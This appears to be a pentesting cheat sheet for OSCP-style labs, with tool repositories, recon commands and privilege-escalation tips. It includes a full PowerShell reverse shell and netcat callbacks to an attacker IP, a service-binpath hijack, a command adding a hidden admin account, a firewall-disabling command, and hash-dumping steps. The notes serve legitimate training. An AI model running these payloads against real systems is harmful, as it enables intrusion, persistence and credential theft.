pentesting_notes

Pull requests welcome.

Preparing your environment

Clone the following repositories:

  • https://github.com/superkojiman/onetwopunch - Wrapper around nmap/unicorn scanner
  • https://github.com/AutoRecon/AutoRecon - Another recon script
  • https://github.com/codingo/Reconnoitre - Recon script with suggested follow-up commands
  • https://github.com/jivoi/pentest - Fully automated recon
  • https://github.com/danielmiessler/SecLists - Wordlists
  • https://github.com/mthbernardes/rsg - Reverse shell generator
  • https://github.com/rebootuser/LinEnum - Linux privesc enumeration
  • https://github.com/mzet-/linux-exploit-suggester - Linux privesc enumeration
  • https://github.com/TH3xACE/SUDO_KILLER - Bash script to search for sudo -l misconfigs
  • https://github.com/M4ximuss/Powerless - Windows privesc enumeration (non-powershell)
  • https://github.com/PowerShellMafia/PowerSploit - Windows Powershell-based privesc
  • https://github.com/411Hall/JAWS - Windows privesc enumeration (powershell)
  • https://github.com/absolomb/WindowsEnum - Windows privesc enumeration (powershell)
  • https://github.com/rasta-mouse/Sherlock - Windows kernel exploit checker
  • https://github.com/ankh2054/windows-pentest - Windows pentest scripts
  • https://github.com/SecWiki/windows-kernel-exploits - Precompiled Windows kernel exploits
  • https://github.com/51x/WHP - Collection of Windows attack tools and exploits
  • https://github.com/AusJock/Privilege-Escalation - Windows/Linux kernel exploits
  • https://github.com/3ndG4me/AutoBlue-MS17-010 - MS17-010 for multiple systems
  • https://github.com/GDSSecurity/Windows-Exploit-Suggester - Script that parses systeminfo output to suggest exploits

Or as a list of commands:

git clone --depth 1 https://github.com/superkojiman/onetwopunch.git
git clone --depth 1 https://github.com/AutoRecon/AutoRecon.git
git clone --depth 1 https://github.com/codingo/Reconnoitre.git
git clone --depth 1 https://github.com/jivoi/pentest.git
git clone --depth 1 https://github.com/danielmiessler/SecLists.git
git clone --depth 1 https://github.com/mthbernardes/rsg.git
git clone --depth 1 https://github.com/rebootuser/LinEnum.git
git clone --depth 1 https://github.com/mzet-/linux-exploit-suggester.git
git clone --depth 1 https://github.com/TH3xACE/SUDO_KILLER.git
git clone --depth 1 https://github.com/M4ximuss/Powerless.git
git clone --depth 1 https://github.com/411Hall/JAWS.git
git clone --depth 1 https://github.com/PowerShellMafia/PowerSploit.git
git clone --depth 1 https://github.com/absolomb/WindowsEnum.git
git clone --depth 1 https://github.com/rasta-mouse/Sherlock.git
git clone --depth 1 https://github.com/ankh2054/windows-pentest.git
git clone --depth 1 https://github.com/SecWiki/windows-kernel-exploits.git
git clone --depth 1 https://github.com/51x/WHP.git
git clone --depth 1 https://github.com/AusJock/Privilege-Escalation.git
git clone --depth 1 https://github.com/3ndG4me/AutoBlue-MS17-010.git
git clone --depth 1 https://github.com/GDSSecurity/Windows-Exploit-Suggester.git

Starting a pentest

Beginning a pentest against a host? Start with the following commands:

nmap -A -sV --script=default,vuln,smb-vuln* -p- --open -oA tcp_10.11.1.x 10.11.1.x
nmap -A -sV -sU --script=default,vuln --open -oA udp_10.11.1.x 10.11.1.x
echo "10.11.1.x" > 10.11.1.x_target.txt && ~/Desktop/tools/onetwopunch.sh -i tap0 -t 10.11.1.x_target.txt
python3 ~/Desktop/tools/AutoRecon/autorecon.py "10.11.1.x" -v -o ~/Desktop/oscp

Searchsploit can run with nmap output: searchsploit --nmap tcp_10.11.1.x.xml

Ideally, your goal is to enumerate your attack surface in as much detail as possible: every exposed service, with full details (version, modules, and configuration).

Don't forget to try default creds. Not all scripts have useful console output. Wireshark may be useful for manually reviewing if auth is successful.

See https://guide.offsecnewbie.com/general-methodology

Protocol specific notes

FTP

  • Scan for anonymous access
  • Filezilla fails to connect if the directory listing isn't allowed.
  • Always use binary mode when transferring files
  • FTP command line reference:
Connect: ftp <ip>
Binary mode:   binary
List files:    ls
Change dir:    cd
Download file: get <file>
Upload file:   put <file>

HTTP

HTTP consists of several components:

  • Web server
  • Programming language (if any)
  • Back-end platform/framework (Drupal, WordPress, etc.) and plugins
  • Front-end UI

Other notes:

  • Each component has its own vulnerabilities. Front-end vulns are useful for XSS and the like.
  • A web server listens on one or more ports. It can also run multiple languages and multiple frameworks at different paths.

Web Servers:

  • Apache, nginx, and Microsoft IIS are most common.
  • Less-common web servers are more likely to have vulnerabilities and misconfigurations.

Web scanners:

  • nikto to scan for vulns: nikto -h [IP] -p [PORT] -o "[OUTPUT].txt"
  • whatweb to detect versions: whatweb --aggression 2 www.example.com
  • gobuster to enumerate directories. gobuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.11.1.x:80
    • If you know you can create files on a web server, but aren't sure where they are, bruteforcing is acceptable
    • Recommended wordlists: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt and /usr/share/seclists/Discovery/Web-Content/common.txt

Coldfusion

ColdFusion guide: https://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers

WordPress

wpscan --url www.example.com

LDAP

  • nmap -p 389 --script ldap-rootdse -Pn 1.2.3.4
  • nmap -p 389 --script ldap-search -Pn 1.2.3.4
  • ldapsearch -x -h 1.2.3.4 -s base namingcontexts
  • ldapsearch -x -h 1.2.3.4 -b "dc=lightweight,dc=htb"

SMB

For Linux targets running SMB, it may be possible to find a version number in the raw network traffic with Wireshark in the smb.native_lanman field.

Lessons Learned

Exploitation

If an exploit looks like it should be successful, but is failing to connect back with a reverse shell, try cycling through common ports: 80, 443, 8080, 53.

If the exploit itself works, try payloads other than a reverse shell. Adding an admin/root user and connecting via SSH/RDP is an alternative to an immediate root shell.

  • Reverse shell one-liners: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

General Privilege escalation

Concepts:

  • https://github.com/sagishahar/lpeworkshop

Ports for reverse shell

Trying to figure out whether a port is available for a further connect-back? Try nmap + Wireshark.

On compromised host, run: nmap -sV -P0 -p- 10.11.0.57

On attacker system, use the following wireshark filter: ip.src == 10.11.1.252 && tcp.flags.syn == 1 && tcp.flags.ack == 0

Lazy credentials

If you see lazy passwords in one place of admin/admin, expect that there might be lazy passwords in other places too.

Windows Privilege escalation

  • accesschk.exe /accepteula -c * for seeing services with RW access, so the service image path itself can be changed.
  • https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  • Sometimes files may be hidden. Use dir /A instead of dir.
  • https://guif.re/windowseop
  • Show user information: net user username
  • Show information on group: net localgroup administrators
  • May have stored credentials: cmdkey /list
    • Escalate with: runas /user:ACCESS\Administrator /savecred "command"
  • Windows reverse shell: $client = New-Object System.Net.Sockets.TCPClient("10.10.12.84",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Run/Transfer/Exfil files with SMB:

An SMB server on the Kali box is the easiest way to run/transfer/exfil files.

  • Start SMB server: python /usr/share/doc/python-impacket/examples/smbserver.py -smb2support share /www
    • Note: Some Windows hosts are locked down and only allow SMB2
  • Copy file: COPY \\10.10.12.84\share\PowerUp.ps1 PowerUp.ps1
  • Run command: \\10.10.12.84\share\nc.exe -nv -e cmd.exe 10.10.12.84 80

Second shell

After getting a shell, get a second shell with "start" in case the first one bugs up/hangs/crashes (assuming running SMB server): victim > start \\10.10.12.84\share\nc.exe -nv -e cmd.exe 10.10.12.84 80

XP SP1 (and earlier) privesc via upnphost:

sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 10.11.0.X 5555 -e C:\Windows\system32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""
sc qc upnphost

Windows privesc enumeration scripts

  • powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
  • https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc and download PowerUp.ps1
    • powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

Windows commands to run as root:

  • Add new admin: net user hacker Winter2019! /add && net localgroup administrators hacker /add && net group administrators hacker /add
  • Disable windows firewall: NetSh Advfirewall set allprofiles state off

Windows Privesc online resources

  • https://www.roguesecurity.in/2018/12/02/a-guide-for-windows-penetration-testing/
  • https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
  • Exploits: http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
  • http://www.fuzzysecurity.com/tutorials/16.html
  • https://toshellandback.com/2015/11/24/ms-priv-esc/

Linux Privilege escalation

Concepts

  • https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
  • Local Linux Enumeration & Privilege Escalation Cheatsheet (by author of LinEnum) - https://www.rebootuser.com/?p=1623
  • sudo -l abuse: https://bitvijays.github.io/LFC-VulnerableMachines.html#sudo-l-permissions

Scripts

  • LinEnum.sh -t -s

General Guidance

  • Compiling exploits: gcc -o sploit 9545.c -Wl,--hash-style=both

  • Recommended Kernel Exploits:

    • FreeBSD 9.0: https://www.exploit-db.com/exploits/28718
    • Ubuntu 16.04: https://www.exploit-db.com/exploits/39772
    • Linux 2.6.9-89.EL: https://www.exploit-db.com/exploits/9545
    • Linux beta 3.0.0-12-generic: https://gist.github.com/karthick18/1686299
    • Linux Kernel 2.6.39 to 3.2.2 (x86/x64) 'Mempodipper': https://www.exploit-db.com/exploits/35161
    • Linux core 2.6.32-21: https://www.exploit-db.com/exploits/14814/
    • Diverse unix: https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/blob/master/2009/CVE-2009-2692/2.6.18.c & https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack
    • Diverse Windows: https://github.com/jivoi/pentest/blob/master/exploit_win/win_local_exploits.md
  • Exploiting services running as root that shouldn't be:

    • MySQL: https://www.exploit-db.com/exploits/1518

Post-rooting activities

  • Dump and crack hashes
    • Linux:
      • Dump: cat /etc/shadow
      • Crack:
    • Windows:
      • Dump hashes #1: wce32.exe -w or wce64.exe -w
      • Dump hashes #2: fgdump.exe && type *.pwdump
      • Crack with: https://hashkiller.co.uk/Cracker/NTLM
      • Or: john ./hashes.txt --format=nt --wordlist=/usr/share/wordlists/rockyou.txt
      • Or: hashcat -m 1000 hash.pwd /usr/share/wordlists/rockyou.txt --force
  • Look for interesting files only accessible to root/admin
    • Sensitive files in Desktop or Documents
    • Backup files
    • Sensitive data in Windows Registry

Transferring files:

  • Python HTTP Server: python -m SimpleHTTPServer <port>
  • Python SMB Server: python /usr/share/doc/python-impacket/examples/smbserver.py share /www
  • wget in VBS: https://github.com/pythonmaster41/Go-For-OSCP/blob/master/Useful_Scripts/FILE_TRANSFER_Script/2.VBS/transfer-command.txt

Writing Exploits:

  • https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/
  • When in doubt, it may be wise to assume common badchars (\x00, CR, LF)
  • Online assembler: https://defuse.ca/online-x86-assembler.htm

Online Resources

  • https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html - Amazing resource on methodology
  • https://github.com/DigitalAftermath/EnumerationVisualized/wiki
  • https://forums.offensive-security.com/showthread.php?4689-Offensive-Security-s-Complete-Guide-to-Alpha
  • https://www.roguesecurity.in/2018/12/02/a-guide-for-windows-penetration-testing/
  • https://sushant747.gitbooks.io/total-oscp-guide/
  • https://blog.ropnop.com/transferring-files-from-kali-to-windows/ - File Transfer techniques
  • http://www.fuzzysecurity.com/tutorials/16.html
  • https://guif.re
  • https://jhalon.github.io/OSCP-Review/
  • https://scriptdotsh.com/index.php/2018/04/17/31-days-of-oscp-experience/
  • https://411hall.github.io/JAWS-Enumeration/
  • https://www.securitysift.com/offsec-pwb-oscp/
  • https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97
  • https://www.reddit.com/r/oscp/comments/a9e2yv/from_0_to_oscp_in_90days/